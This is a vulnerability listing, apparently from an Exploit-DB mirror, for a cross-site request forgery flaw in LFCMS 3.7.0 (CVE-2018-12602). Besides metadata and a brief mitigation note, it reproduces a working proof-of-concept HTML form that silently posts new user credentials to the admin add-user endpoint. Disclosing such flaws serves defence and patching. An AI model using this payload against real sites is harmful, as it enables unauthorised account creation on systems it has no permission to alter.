A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.

vendor:

LFCMS

by:

bay0net

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: LFCMS

Affected Version From: 3.7.0

Affected Version To: 3.7.0

Patch Exists: YES

Related CWE: CVE-2018-12602

CPE: a:lfdycms:lfcms:3.7.0

Metasploit: N/A

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=105262

Platforms Tested: None

2018

A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.

A CSRF vulnerability exists in LFCMS_3.7.0, which allows users to be added arbitrarily. The payload for attack is an HTML form with hidden inputs containing the username, email, password, and repassword of the user to be added.

Mitigation:

Implementing CSRF protection mechanisms such as tokens, same-site cookies, and CAPTCHAs can help mitigate the risk of CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602


A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.


The payload for attack is as follows.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="test2@qq.com" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>